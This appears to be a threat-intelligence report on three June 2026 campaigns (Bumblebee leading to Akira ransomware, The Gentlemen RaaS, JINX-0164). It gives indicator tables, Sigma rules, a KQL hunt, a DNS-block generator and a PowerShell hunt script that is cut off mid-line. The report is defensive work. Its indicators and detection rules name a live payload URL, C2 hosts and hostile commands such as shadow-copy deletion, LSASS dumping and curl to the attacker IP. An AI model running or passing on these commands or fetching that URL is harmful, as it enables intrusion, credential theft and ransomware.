Three OTX pulses published between June 27–30, 2026 reveal a converging threat landscape where initial access brokers, ransomware affiliates, and supply chain attackers are operating simultaneously across different attack surfaces:
- Bumblebee → AdaptixC2 → Akira Ransomware Chain: An SEO poisoning campaign abused Bing search results to deliver trojanized ManageEngine OpManager installers. Users searching for legitimate IT management tools were served malicious downloads that deployed Bumblebee loader, establishing AdaptixC2 command-and-control channels. Attackers exploited the fact that IT administrators were executing these tools, enabling rapid lateral movement via RustDesk, credential dumping, and ultimately Akira ransomware deployment.
- The Gentlemen RaaS Expansion: Emerging as a top-10 ransomware threat actor in H1 2026, The Gentlemen exploit vulnerabilities in internet-facing VPNs and firewalls, potentially leveraging initial access brokers. Their toolkit includes SharkLoader, Cobalt Strike, MgBot, AppleSeed, and multiple custom loaders. They conduct comprehensive reconnaissance using SharpADWS, NetScan, and Advanced IP Scanner, capture network traffic with netsh, and deploy ransomware via GPO — targeting manufacturing, technology, healthcare, finance, construction, and transportation sectors across Brazil, China, Indonesia, Taiwan, and Thailand.
- JINX-0164 Cryptocurrency Supply Chain Attacks: A financially motivated actor targeting cryptocurrency organizations' software development infrastructure since mid-2025. JINX-0164 uses LinkedIn social engineering to deliver custom macOS malware — AUDIOFIX (Python-based infostealer/RAT) and MINIRAT (Go backdoor) — while also conducting NPM supply chain attacks and CI/CD pipeline hijacking to compromise developer environments.
Collectively, these campaigns demonstrate threat actors exploiting trusted software distribution channels (SEO, NPM), targeting privileged users (IT admins, developers), and using modular payload architectures to achieve financial objectives through ransomware or data theft.
Threat Actor / Malware Profile
Bumblebee (S1039) → AdaptixC2 → Akira
| Attribute | Detail |
|---|---|
| Distribution | SEO poisoning on Bing; trojanized ManageEngine OpManager and Angry IP Scanner installers hosted on lookalike domains (opmanager.pro, angryipscanner.org) |
| Initial Access | User-executed trojanized installer (T1204.002 — Malicious File) |
| Loader Behavior | Bumblebee DLL loading via regsvr32 or rundll32; reflective DLL injection into legitimate processes |
| C2 Framework | AdaptixC2 — HTTPS beaconing with jittered intervals; traffic blended with legitimate web patterns |
| Lateral Movement | RustDesk deployment for interactive remote access; SMB share enumeration; PsExec-style execution |
| Credential Access | LSASS memory dumping; NTDS.dit extraction; credential reuse across hosts (T1003) |
| Impact | Akira ransomware deployment — file encryption with .akira extension; shadow copy deletion via vssadmin/wmic (T1486) |
| Anti-Analysis | DLL execution from temp directories; delayed execution; environment keying to avoid sandbox detonation |
The Gentlemen RaaS
| Attribute | Detail |
|---|---|
| Distribution | Exploitation of internet-facing VPN/firewall vulnerabilities (T1190); potential initial access broker collaboration |
| Reconnaissance | SharpADWS for Active Directory enumeration via web services; NetScan and Advanced IP Scanner for network discovery (T1046); netsh trace for packet capture (T1040) |
| Loaders & Implants | SharkLoader (multi-stage loader), Cobalt Strike (S0154), MgBot (modular framework), AppleSeed (S0622 backdoor), CoolClient (persistence agent), ZiChatBot (communication), PowerCloud (cloud-aware module), ReverseSocks (proxy infrastructure) |
| Lateral Movement | GPO-based deployment across domain-joined systems (T1570); vulnerable driver exploitation for privilege escalation |
| Persistence | Scheduled tasks, GPO-deployed binaries, Windows services via CoolClient |
| Impact | File encryption with variant-specific extension; double extortion model (T1486) |
| Targeting | Manufacturing, Technology, Healthcare, Finance, Construction, Transportation; geographic focus on Brazil, China, Indonesia, Taiwan, Thailand |
JINX-0164
| Attribute | Detail |
|---|---|
| Distribution | LinkedIn social engineering (posing as recruiters/business partners); NPM trojanized packages; CI/CD pipeline hijacking (T1195) |
| Payload — AUDIOFIX | Python-based infostealer and RAT; targets cryptocurrency wallets, SSH keys, browser credentials; exfiltrates via HTTPS to attacker-controlled domains (driver-updater.net, live.ong) |
| Payload — MINIRAT | Lightweight Go backdoor; establishes persistent reverse shell; uses legitimate-looking domains (login.teamicrosoft.com, teams.live.us.org) for C2 |
| C2 Infrastructure | Typosquatted Microsoft/Teams domains; IP-based C2 at 89.36.224.5; install script hosted at http://89.36.224.5/troubleshoot/mac/install.sh |
| Persistence | LaunchAgent/LaunchDaemon plists (macOS); cron jobs; hidden shell scripts in user directories |
| Anti-Analysis | Execution from temporary directories; delayed beaconing; environment checks before payload activation |
| Objective | Cryptocurrency theft; source code exfiltration; persistent access to CI/CD pipelines for secondary supply chain compromises |
IOC Analysis
The three pulses collectively contribute 162 indicators (22 + 48 + 92) across multiple indicator types:
Indicator Breakdown
| Type | Count | Key Examples | Operational Use |
|---|---|---|---|
| IPv4 | 2+ | 172.96.137.160, 89.36.224.5 | Firewall egress rules, EDR network telemetry, proxy logs |
| Domain | 4+ | angryipscanner.org, opmanager.pro, driver-updater.net, live.ong | DNS sinkholing, web proxy blocks, email gateway filtering |
| Hostname | 4+ | login.teamicrosoft.com, teams.live.us.org, rsat.activedirectory.ds-lds.tools | DNS response policy zones, TLS SNI inspection, proxy URL filtering |
| URL | 1+ | http://89.36.224.5/troubleshoot/mac/install.sh | Web proxy blocks, IDS signature matching, EDR download monitoring |
| FileHash-SHA256 | 4+ | a14506c6…, f8965fdc…, 5af1dae2…, b6cab0b3… | EDR block lists, AV signatures, file integrity monitoring |
| FileHash-MD5 | 4+ | a746da51…, bcee0ab1…, 9321a61a…, b6b51508… | Legacy AV engines, SIEM correlation rules |
| FileHash-SHA1 | 4+ | 1b9aa401…, f352cec8…, 6afc6b04…, 96f0dbf5… | Certificate pinning validation, binary reputation checks |
Operationalization Guidance
SOC teams should deploy these IOCs across the following layers:
- Network Layer: Feed all IPs, domains, and hostnames into SIEM threat intelligence platforms (AlienVault OTX direct import, MISP, ThreatConnect). Configure IDS/IPS (Suricata, Snort, Zeek) with custom rules for domain and IP matching. Deploy DNS response policy zones for domain-based blocking.
- Endpoint Layer: Push all SHA256 hashes to EDR platforms (CrowdStrike, Defender for Endpoint, SentinelOne) as blocklists. Create custom detection rules for MD5/SHA1 hashes on legacy systems. Monitor for RustDesk executable deployment in non-standard directories.
- Cloud/Email Layer: Configure email gateways to block messages containing links to typosquatted domains (login.teamicrosoft.com, teams.live.us.org). Deploy CASB rules for unsanctioned SaaS applications matching C2 domains.
- Developer Infrastructure: Scan NPM registries and CI/CD pipelines for indicators matching JINX-0164 infrastructure. Implement package allowlisting and signed package verification.
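As an added example (not part of the report or of any Security Arsenal tooling), the Python script below turns the network indicators from the IOC tables into a BIND-style response policy zone for the DNS-blocking step in the Network Layer item. The zone name, SOA values and serial are placeholders to adapt, and it assumes a resolver that supports RPZ.

```python
import ipaddress
import re

# Placeholder zone name and SOA values; point these at your resolver's RPZ zone.
RPZ_ZONE = "rpz.example.invalid"
HOSTNAME_RE = re.compile(r"^(?=.{1,253}$)(?!-)([a-z0-9-]{1,63}\.)+[a-z]{2,63}$")

# Network indicators from the report, tagged with the campaign they belong to.
NETWORK_IOCS = [
    ("172.96.137.160", "Bumblebee/Akira"),
    ("89.36.224.5", "JINX-0164"),
    ("angryipscanner.org", "Bumblebee/Akira"),
    ("opmanager.pro", "Bumblebee/Akira"),
    ("driver-updater.net", "JINX-0164"),
    ("www.driver-updater.net", "JINX-0164"),
    ("live.ong", "JINX-0164"),
    ("login.teamicrosoft.com", "JINX-0164"),
    ("teams.live.us.org", "JINX-0164"),
    ("www.live.us.org", "JINX-0164"),
    ("rsat.activedirectory.ds-lds.tools", "Gentlemen RaaS"),
]


def classify(indicator: str) -> str:
    """Return 'ipv4', 'name' or 'invalid' for one indicator (IPv6 is not handled here)."""
    try:
        return "ipv4" if ipaddress.ip_address(indicator).version == 4 else "invalid"
    except ValueError:
        return "name" if HOSTNAME_RE.match(indicator.lower()) else "invalid"


def covered_by_parent(name: str, names: set) -> bool:
    """True when a listed parent domain's wildcard record already covers this name."""
    parts = name.split(".")
    return any(".".join(parts[i:]) in names for i in range(1, len(parts) - 1))


def rpz_records(indicator: str, label: str) -> list:
    """RPZ records for one indicator.
    Names: the name and every subdomain are rewritten to NXDOMAIN (CNAME .).
    IPv4: a response-IP trigger 'prefix.reversed-octets.rpz-ip' (/32 here) that
    fires when any DNS answer contains that address."""
    kind = classify(indicator)
    if kind == "ipv4":
        rev = ".".join(reversed(indicator.split(".")))
        return [f"32.{rev}.rpz-ip\tCNAME\t. ; {label}"]
    if kind == "name":
        return [f"{indicator}\tCNAME\t. ; {label}", f"*.{indicator}\tCNAME\t. ; {label}"]
    raise ValueError(f"not an IPv4 address or hostname: {indicator!r}")


def build_zone(iocs=NETWORK_IOCS, zone=RPZ_ZONE, serial=2026063001) -> str:
    """Render the full zone file text; redundant child names are skipped."""
    names = {i for i, _ in iocs if classify(i) == "name"}
    lines = [
        f"; RPZ zone {zone} generated from June 2026 OTX pulse indicators",
        "$TTL 300",
        f"@\tIN\tSOA\tlocalhost. root.localhost. ({serial} 3600 900 604800 300)",
        "@\tIN\tNS\tlocalhost.",
    ]
    for indicator, label in iocs:
        if classify(indicator) == "name" and covered_by_parent(indicator, names):
            continue  # e.g. www.driver-updater.net is already caught by *.driver-updater.net
        lines.extend(rpz_records(indicator, label))
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    print(build_zone())
```

Load the output as the zone configured under your resolver's response-policy statement; the rpz-ip triggers act on answers, so they complement rather than replace the firewall egress rules in the IOC table.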
Detection Engineering
Sigma Rules
```yaml
title: Bumblebee Loader Execution via Trojanized IT Management Installer
id: 7a3c1f2e-8b4d-4a6e-9c2f-1d5e7a3b9c4f
status: experimental
description: >
  Detects Bumblebee malware execution patterns originating from trojanized
  IT management tool installers (ManageEngine OpManager, Angry IP Scanner)
  delivered via SEO poisoning, followed by AdaptixC2 beaconing and Akira
  ransomware staging activity.
references:
  - https://thedfirreport.com/2025/08/05/from-bing-search-to-ransomware-bumblebee-and-adaptixc2-deliver-akira-2/
author: Security Arsenal Threat Intelligence
date: 2026/06/30
tags:
  - attack.execution
  - attack.t1204.002
  - attack.credential_access
  - attack.t1003
  - attack.lateral_movement
  - attack.t1021.002
logsource:
  product: windows
  category: process_creation
detection:
  selection_loader:
    Image|endswith:
      - '\rundll32.exe'
      - '\regsvr32.exe'
    CommandLine|contains:
      - 'AppData\Local\Temp'
      - 'ProgramData'
      - 'Public\'
  selection_installer_source:
    ParentImage|contains:
      - 'OpManager'
      - 'opmanager'
      - 'AngryIPScanner'
      - 'angryip'
    ParentImage|endswith:
      - '\setup.exe'
      - '\installer.exe'
      - '\msiexec.exe'
  selection_rustdesk:
    Image|endswith:
      - '\rustdesk.exe'
    CommandLine|contains:
      - '--password'
      - '--connect'
      - '--get-id'
  selection_credential_dump:
    Image|endswith:
      - '\procdump.exe'
      - '\ntdsutil.exe'
    CommandLine|contains:
      - 'lsass'
      - 'ntds'
      - 'minidump'
  selection_akira_staging:
    Image|endswith:
      - '\vssadmin.exe'
      - '\wmic.exe'
      - '\wbadmin.exe'
    CommandLine|contains:
      - 'delete shadows'
      - 'shadowcopy delete'
      - 'delete catalog'
  condition: (selection_loader and selection_installer_source) or selection_rustdesk or selection_credential_dump or selection_akira_staging
fields:
  - Image
  - CommandLine
  - ParentImage
  - User
  - ComputerName
falsepositives:
  - Legitimate RustDesk administration (verify with IT ops)
  - Authorized credential auditing tools
  - Legitimate shadow copy maintenance during backups
level: high
```
```yaml
title: The Gentlemen RaaS Reconnaissance and Lateral Movement via GPO
id: 9e2b4c7a-1f3d-5a8e-b6c4-2d8f0a1e3b5c
status: experimental
description: >
  Detects reconnaissance and lateral movement techniques associated with
  The Gentlemen ransomware-as-a-service group, including netsh packet
  capture, SharpADWS Active Directory enumeration, network scanning tools,
  and GPO-based malicious deployment across domain-joined systems.
references:
  - https://securelist.com/the-gentlemen-raas/120447/
author: Security Arsenal Threat Intelligence
date: 2026/06/30
tags:
  - attack.discovery
  - attack.t1046
  - attack.t1040
  - attack.lateral_movement
  - attack.t1570
  - attack.t1486
logsource:
  product: windows
  category: process_creation
detection:
  selection_netsh_trace:
    Image|endswith: '\netsh.exe'
    CommandLine|contains:
      - 'trace start'
      - 'capture start'
  selection_ad_enum:
    Image|endswith:
      - '\SharpADWS.exe'
      - '\powershell.exe'
      - '\pwsh.exe'
    CommandLine|contains:
      - 'SharpADWS'
      - 'ActiveDirectory.WebServices'
      - 'Get-ADUser'
      - 'Get-ADComputer'
      - 'Get-ADGroupMember'
  selection_network_scan:
    Image|endswith:
      - '\netscan.exe'
      - '\advanced_ip_scanner.exe'
      - '\nmap.exe'
    CommandLine|contains:
      - '/scan'
      - '-sV'
      - '--range'
  selection_gpo_deploy:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
      - '\cmd.exe'
    CommandLine|contains:
      - 'New-GPO'
      - 'Set-GPPrefRegistryValue'
      - 'New-GPLink'
      - 'gpupdate /force'
      - '\SYSVOL\'
  selection_cobalt_strike:
    Image|endswith:
      - '\rundll32.exe'
      - '\powershell.exe'
    CommandLine|contains:
      - 'ampoline'
      - 'start-thread'
      - 'FreeLibrary'
      - 'VirtualAlloc'
  condition: selection_netsh_trace or selection_ad_enum or selection_network_scan or selection_gpo_deploy or selection_cobalt_strike
fields:
  - Image
  - CommandLine
  - ParentImage
  - User
  - ComputerName
falsepositives:
  - Authorized network troubleshooting with netsh trace
  - Legitimate AD administration tools
  - Approved network scanning by security team
  - GPO deployment by authorized sysadmins
level: high
```
```yaml
title: JINX-0164 AUDIOFIX and MINIRAT Execution on macOS Developer Systems
id: 3f7a9c2e-5b1d-4e8f-a3c6-9d2b7e4f1a8c
status: experimental
description: >
  Detects execution of AUDIOFIX (Python infostealer/RAT) and MINIRAT
  (Go backdoor) malware delivered by JINX-0164 threat actor targeting
  cryptocurrency developer infrastructure via LinkedIn social engineering
  and NPM supply chain attacks.
references:
  - https://www.wiz.io/blog/threat-actors-target-crypto-orgs
author: Security Arsenal Threat Intelligence
date: 2026/06/30
tags:
  - attack.execution
  - attack.t1059.006
  - attack.t1195.002
  - attack.command_and_control
  - attack.t1105
logsource:
  product: macos
  category: process_creation
detection:
  selection_audiofix_python:
    Image|endswith:
      - '/python3'
      - '/python'
    CommandLine|contains:
      - 'audiofix'
      - 'troubleshoot/mac/install.sh'
      - 'driver-updater.net'
      - 'live.ong'
  selection_minirat_go:
    Image|endswith:
      - '/main'
      - '/minirat'
      - '/client'
    ParentImage|contains:
      - '/tmp/'
      - '/var/tmp/'
      - '/Users/'
      - '/Library/Application Support/'
  selection_c2_domain:
    CommandLine|contains:
      - 'login.teamicrosoft.com'
      - 'teams.live.us.org'
      - 'www.driver-updater.net'
      - 'www.live.us.org'
      - '89.36.224.5'
  selection_install_script:
    Image|endswith:
      - '/sh'
      - '/bash'
      - '/curl'
      - '/wget'
    CommandLine|contains:
      - 'install.sh'
      - 'troubleshoot/mac/'
      - 'curl http://89.36.224.5'
  selection_npm_suspicious:
    Image|endswith:
      - '/npm'
      - '/node'
    CommandLine|contains:
      - 'postinstall'
      - 'preinstall'
      - 'child_process'
      - 'exec('
      - 'spawn('
  condition: selection_audiofix_python or selection_minirat_go or selection_c2_domain or selection_install_script or selection_npm_suspicious
fields:
  - Image
  - CommandLine
  - ParentImage
  - User
  - ComputerName
falsepositives:
  - Legitimate Python development scripts (verify context)
  - Authorized npm package installation
  - DevOps CI/CD scripts with similar patterns
level: high
```
KQL Hunt Query — Microsoft Sentinel
```kusto
// Triple Threat IOC Hunt: Bumblebee/Akira + Gentlemen RaaS + JINX-0164
// Run in a Microsoft Sentinel Log Analytics workspace with the Defender for Endpoint
// connector enabled (DeviceProcessEvents / DeviceNetworkEvents tables).
let Pulse1_Hashes = dynamic([
    "a14506c6fb92a5af88a6a44d273edafe10d69ee3d85c8b2a7ac458a22edf68d2",
    "a746da514c90f26a187a294fda7edc1b",
    "bcee0ab10b23f5999bcdb56c0b4a631a",
    "1b9aa401457d29405c0bcf19cbf19a7028a0d214",
    "f352cec89a56e23dae20cdd62df4d40bc7f22b5e"
]);
let Pulse2_Hashes = dynamic([
    "9321a61a25c7961d9f36852ecaa86f55",
    "6afc6b04cf73dd461e4a4956365f25c1f1162387",
    "f8965fdce668692c3785afa3559159f9a18287bc0d53abb21902895a8ecf221b",
    "5af1dae21425dda8311a2044209c308525135e1733eeff5dd20649946c6e054c",
    "b6b51508ad6f462c45fe102c85d246c8",
    "96f0dbf52aed0afd43e44500116b04b674f7358e",
    "7556ae58c215b8245a43f764f0676c7a8f0fdd1a"
]);
let Pulse3_Hashes = dynamic([
    "b6cab0b3aa8e56e2427f486c74588d598ae58bb0cbc0eda6939fe171cb0aed17"
]);
let AllHashes = array_concat(Pulse1_Hashes, Pulse2_Hashes, Pulse3_Hashes);
let MaliciousDomains = dynamic([
    "angryipscanner.org", "opmanager.pro", "driver-updater.net",
    "live.ong", "login.teamicrosoft.com", "teams.live.us.org",
    "www.driver-updater.net", "www.live.us.org",
    "rsat.activedirectory.ds-lds.tools"
]);
let MaliciousIPs = dynamic(["172.96.137.160", "89.36.224.5"]);
// --- Process hash matches (in~ is case-insensitive, so hash casing in the tables does not matter) ---
DeviceProcessEvents
| where SHA256 in~ (AllHashes) or MD5 in~ (AllHashes) or SHA1 in~ (AllHashes)
| extend ThreatGroup = case(
    SHA256 in~ (Pulse1_Hashes) or MD5 in~ (Pulse1_Hashes) or SHA1 in~ (Pulse1_Hashes), "Bumblebee/Akira",
    SHA256 in~ (Pulse2_Hashes) or MD5 in~ (Pulse2_Hashes) or SHA1 in~ (Pulse2_Hashes), "Gentlemen RaaS",
    SHA256 in~ (Pulse3_Hashes) or MD5 in~ (Pulse3_Hashes) or SHA1 in~ (Pulse3_Hashes), "JINX-0164",
    "Unknown")
| project Timestamp, DeviceName, ThreatGroup, FileName, FolderPath, SHA256, MD5, SHA1, InitiatingProcessFileName, AccountName
| union (
    // --- Network connections to malicious infrastructure ---
    DeviceNetworkEvents
    | where RemoteIP in (MaliciousIPs)
        or RemoteUrl has_any (MaliciousDomains)
        or RemoteUrl contains "89.36.224.5/troubleshoot/mac/install.sh"
    | extend ThreatGroup = case(
        RemoteIP == "172.96.137.160" or RemoteUrl contains "angryipscanner" or RemoteUrl contains "opmanager.pro", "Bumblebee/Akira",
        RemoteIP == "89.36.224.5" or RemoteUrl contains "driver-updater" or RemoteUrl contains "live.ong" or RemoteUrl contains "teamicrosoft" or RemoteUrl contains "live.us.org", "JINX-0164",
        RemoteUrl contains "rsat.activedirectory", "Gentlemen RaaS",
        "Unknown")
    | project Timestamp, DeviceName, ThreatGroup, RemoteUrl, RemoteIP, RemotePort, InitiatingProcessFileName, InitiatingProcessAccountName
)
| union (
    // --- Behavioral detections: recon, credential dumping, lateral movement ---
    DeviceProcessEvents
    | where (FileName =~ "netsh.exe" and ProcessCommandLine has "trace" and ProcessCommandLine has "start")
        or (ProcessCommandLine has "SharpADWS" or ProcessCommandLine has "ActiveDirectory.WebServices")
        or (ProcessCommandLine has "New-GPO" or ProcessCommandLine has "Set-GPPrefRegistryValue" or ProcessCommandLine has "New-GPLink")
        or (FileName =~ "rustdesk.exe" and (ProcessCommandLine has "--password" or ProcessCommandLine has "--connect"))
        or (ProcessCommandLine has "lsass" and ProcessCommandLine has "dump")
        or (ProcessCommandLine has "ntdsutil" and ProcessCommandLine has "active instance")
        or (FileName =~ "vssadmin.exe" and ProcessCommandLine has "delete shadows")
        or (FileName =~ "wmic.exe" and ProcessCommandLine has "shadowcopy delete")
    | extend ThreatGroup = case(
        FileName =~ "netsh.exe" or ProcessCommandLine has "SharpADWS" or ProcessCommandLine has "New-GPO", "Gentlemen RaaS",
        FileName =~ "rustdesk.exe", "Bumblebee/Akira",
        ProcessCommandLine has "lsass" or ProcessCommandLine has "ntdsutil", "Bumblebee/Akira",
        FileName =~ "vssadmin.exe" or FileName =~ "wmic.exe", "Bumblebee/Akira (Akira Ransomware)",
        "Unknown")
    | project Timestamp, DeviceName, ThreatGroup, FileName, ProcessCommandLine, InitiatingProcessFileName, AccountName
)
| order by Timestamp desc
```
IOC Hunt Script — PowerShell
```powershell
<#
.SYNOPSIS
    Triple Threat IOC Hunt: Bumblebee/Akira + Gentlemen RaaS + JINX-0164
.DESCRIPTION
    Hunts for file hashes, network connections, DNS cache evidence, RustDesk
    deployment, netsh packet captures, scheduled task and registry persistence
    associated with three active OTX threat pulses from June 2026.
    Run from an elevated session so process images and HKLM keys can be read.
#>
$ErrorActionPreference = "SilentlyContinue"

# === IOC Definitions ===
$HashIOCs = @(
    @{Hash="a14506c6fb92a5af88a6a44d273edafe10d69ee3d85c8b2a7ac458a22edf68d2"; Algo="SHA256"; Threat="Bumblebee/Akira"},
    @{Hash="a746da514c90f26a187a294fda7edc1b"; Algo="MD5"; Threat="Bumblebee/Akira"},
    @{Hash="bcee0ab10b23f5999bcdb56c0b4a631a"; Algo="MD5"; Threat="Bumblebee/Akira"},
    @{Hash="1b9aa401457d29405c0bcf19cbf19a7028a0d214"; Algo="SHA1"; Threat="Bumblebee/Akira"},
    @{Hash="f352cec89a56e23dae20cdd62df4d40bc7f22b5e"; Algo="SHA1"; Threat="Bumblebee/Akira"},
    @{Hash="f8965fdce668692c3785afa3559159f9a18287bc0d53abb21902895a8ecf221b"; Algo="SHA256"; Threat="Gentlemen RaaS"},
    @{Hash="5af1dae21425dda8311a2044209c308525135e1733eeff5dd20649946c6e054c"; Algo="SHA256"; Threat="Gentlemen RaaS"},
    @{Hash="9321a61a25c7961d9f36852ecaa86f55"; Algo="MD5"; Threat="Gentlemen RaaS"},
    @{Hash="b6b51508ad6f462c45fe102c85d246c8"; Algo="MD5"; Threat="Gentlemen RaaS"},
    @{Hash="6afc6b04cf73dd461e4a4956365f25c1f1162387"; Algo="SHA1"; Threat="Gentlemen RaaS"},
    @{Hash="96f0dbf52aed0afd43e44500116b04b674f7358e"; Algo="SHA1"; Threat="Gentlemen RaaS"},
    @{Hash="7556ae58c215b8245a43f764f0676c7a8f0fdd1a"; Algo="SHA1"; Threat="Gentlemen RaaS"},
    @{Hash="b6cab0b3aa8e56e2427f486c74588d598ae58bb0cbc0eda6939fe171cb0aed17"; Algo="SHA256"; Threat="JINX-0164"}
)
$NetworkIOCs = @(
    @{Indicator="172.96.137.160"; Type="IP"; Threat="Bumblebee/Akira"},
    @{Indicator="89.36.224.5"; Type="IP"; Threat="JINX-0164"},
    @{Indicator="angryipscanner.org"; Type="Domain"; Threat="Bumblebee/Akira"},
    @{Indicator="opmanager.pro"; Type="Domain"; Threat="Bumblebee/Akira"},
    @{Indicator="driver-updater.net"; Type="Domain"; Threat="JINX-0164"},
    @{Indicator="live.ong"; Type="Domain"; Threat="JINX-0164"},
    @{Indicator="login.teamicrosoft.com"; Type="Hostname"; Threat="JINX-0164"},
    @{Indicator="teams.live.us.org"; Type="Hostname"; Threat="JINX-0164"},
    @{Indicator="www.driver-updater.net"; Type="Hostname"; Threat="JINX-0164"},
    @{Indicator="www.live.us.org"; Type="Hostname"; Threat="JINX-0164"},
    @{Indicator="rsat.activedirectory.ds-lds.tools"; Type="Hostname"; Threat="Gentlemen RaaS"}
)

Write-Host "`n=== TRIPLE THREAT IOC HUNT — June 2026 OTX Pulses ===" -ForegroundColor Cyan
Write-Host "Scan Start: $(Get-Date -Format 'yyyy-MM-dd HH:mm:ss')`n"
$findings = 0

# 1. Process Hash Scanning (each unique image path is hashed once; many processes share a binary)
Write-Host "[1/6] Scanning running processes for malicious file hashes..." -ForegroundColor Yellow
$procs = Get-Process | Where-Object { $_.Path }
$hashCache = @{}
foreach ($path in ($procs | Select-Object -ExpandProperty Path -Unique)) {
    try {
        $hashCache[$path] = @{
            SHA256 = (Get-FileHash -Path $path -Algorithm SHA256 -ErrorAction Stop).Hash
            MD5    = (Get-FileHash -Path $path -Algorithm MD5 -ErrorAction Stop).Hash
            SHA1   = (Get-FileHash -Path $path -Algorithm SHA1 -ErrorAction Stop).Hash
        }
    } catch {}
}
foreach ($proc in $procs) {
    $hashes = $hashCache[$proc.Path]
    if (-not $hashes) { continue }
    foreach ($ioc in $HashIOCs) {
        # -eq is case-insensitive, so Get-FileHash's uppercase hex matches the lowercase IOC values
        if ($hashes[$ioc.Algo] -eq $ioc.Hash) {
            Write-Host " [!] CRITICAL: $($proc.ProcessName) matches $($ioc.Algo) — Threat: $($ioc.Threat)" -ForegroundColor Red
            Write-Host " PID: $($proc.Id) | Path: $($proc.Path)" -ForegroundColor Red
            $findings++
        }
    }
}

# 2. Network Connection and DNS Cache Scanning
Write-Host "`n[2/6] Checking active network connections and DNS cache against IOC list..." -ForegroundColor Yellow
$conns = Get-NetTCPConnection -State Established
$dnsCache = Get-DnsClientCache
$ipIOCs = $NetworkIOCs | Where-Object { $_.Type -eq "IP" }
$nameIOCs = $NetworkIOCs | Where-Object { $_.Type -in @("Domain","Hostname") }
foreach ($conn in $conns) {
    $remoteIP = $conn.RemoteAddress
    $procInfo = Get-Process -Id $conn.OwningProcess -ErrorAction SilentlyContinue
    foreach ($ioc in $ipIOCs) {
        if ($remoteIP -eq $ioc.Indicator) {
            Write-Host " [!] CRITICAL: Connection to $($ioc.Indicator):$($conn.RemotePort) — Threat: $($ioc.Threat)" -ForegroundColor Red
            Write-Host " Process: $($procInfo.ProcessName) (PID: $($conn.OwningProcess))" -ForegroundColor Red
            $findings++
        }
    }
    foreach ($ioc in $nameIOCs) {
        # Tie the connection back to a name through the resolver cache (A/AAAA entries keep the address in Data)
        $resolvedIPs = $dnsCache | Where-Object { $_.Entry -eq $ioc.Indicator } | Select-Object -ExpandProperty Data
        if ($resolvedIPs -contains $remoteIP) {
            Write-Host " [!] CRITICAL: Domain $($ioc.Indicator) resolved to $remoteIP — Threat: $($ioc.Threat)" -ForegroundColor Red
            Write-Host " Process: $($procInfo.ProcessName) (PID: $($conn.OwningProcess))" -ForegroundColor Red
            $findings++
        }
    }
}
# A cached answer for an IOC name is evidence of a lookup even after the connection has closed
foreach ($ioc in $nameIOCs) {
    $cached = $dnsCache | Where-Object { $_.Entry -eq $ioc.Indicator -or $_.Entry -like "*.$($ioc.Indicator)" }
    if ($cached) {
        Write-Host " [!] WARNING: DNS cache holds $($ioc.Indicator) ($($cached.Data -join ', ')) | Threat: $($ioc.Threat)" -ForegroundColor Red
        $findings++
    }
}

# 3. RustDesk Detection (Bumblebee Lateral Movement)
Write-Host "`n[3/6] Scanning for RustDesk installation (Bumblebee lateral movement tool)..." -ForegroundColor Yellow
$rustdeskLocations = @(
    "C:\Program Files\RustDesk",
    "C:\Program Files (x86)\RustDesk",
    "$env:APPDATA\RustDesk",
    "$env:LOCALAPPDATA\RustDesk",
    "$env:ProgramData\RustDesk"
)
foreach ($loc in $rustdeskLocations) {
    if (Test-Path $loc) {
        $exe = Get-ChildItem -Path $loc -Filter "rustdesk.exe" -Recurse -ErrorAction SilentlyContinue
        if ($exe) {
            Write-Host " [!] WARNING: RustDesk found at $loc" -ForegroundColor Red
            Write-Host " Verify with IT operations — Bumblebee abuses RustDesk for lateral movement" -ForegroundColor Yellow
            $findings++
        }
    }
}
$rustdeskProc = Get-Process -Name "rustdesk" -ErrorAction SilentlyContinue
if ($rustdeskProc) {
    Write-Host " [!] WARNING: RustDesk is currently running (PID: $($rustdeskProc.Id -join ', '))" -ForegroundColor Red
    $findings++
}

# 4. Netsh Trace Detection (Gentlemen RaaS Network Capture)
Write-Host "`n[4/6] Checking for active netsh packet captures (Gentlemen RaaS recon)..." -ForegroundColor Yellow
# netsh exits once the ETW capture session is started, so ask the trace subsystem directly
$traceStatus = (& netsh.exe trace show status 2>&1) -join "`n"
if ($traceStatus -and $traceStatus -notmatch "no trace session") {
    Write-Host " [!] CRITICAL: netsh trace session in progress | potential packet capture by Gentlemen RaaS" -ForegroundColor Red
    Write-Host " $($traceStatus.Trim())" -ForegroundColor Red
    $findings++
}
# Also catch a netsh process that is still running with a trace/capture command line
$netshProcs = Get-CimInstance -ClassName Win32_Process -Filter "Name = 'netsh.exe'" -ErrorAction SilentlyContinue
foreach ($np in $netshProcs) {
    if ($np.CommandLine -match "trace\s+start|capture\s*=\s*yes") {
        Write-Host " [!] CRITICAL: netsh capture running (PID: $($np.ProcessId)): $($np.CommandLine)" -ForegroundColor Red
        $findings++
    }
}

# 5. Scheduled Task Persistence Scanning
Write-Host "`n[5/6] Scanning scheduled tasks for persistence mechanisms..." -ForegroundColor Yellow
$tasks = Get-ScheduledTask | Where-Object { $_.State -ne "Disabled" -and $_.TaskPath -notmatch "\\Microsoft\\" }
foreach ($task in $tasks) {
    foreach ($action in $task.Actions) {
        $cmdString = "$($action.Execute) $($action.Arguments)"
        if ($cmdString -match "http[s]?://|\.ps1|\.bat|\.vbs|Base64|DownloadString|Invoke-Expression|rundll32|regsvr32|AppData") {
            Write-Host " [!] SUSPICIOUS TASK: $($task.TaskName)" -ForegroundColor Red
            Write-Host " Command: $cmdString" -ForegroundColor Red
            Write-Host " Path: $($task.TaskPath)" -ForegroundColor Red
            $findings++
        }
    }
}

# 6. Registry Run Key Persistence
Write-Host "`n[6/6] Scanning registry Run keys for malicious persistence..." -ForegroundColor Yellow
$regPaths = @(
    "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce",
    "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce",
    "HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run"
)
foreach ($rp in $regPaths) {
    $props = Get-ItemProperty -Path $rp -ErrorAction SilentlyContinue
    if ($props) {
        # Skip the PS* metadata properties that Get-ItemProperty adds to every key
        foreach ($p in $props.PSObject.Properties | Where-Object { $_.Name -notmatch "^PS" }) {
            if ($p.Value -match "http|\.ps1|\.bat|\.vbs|rundll32|regsvr32|AppData|powershell.*-enc|cmd\.exe.*/c") {
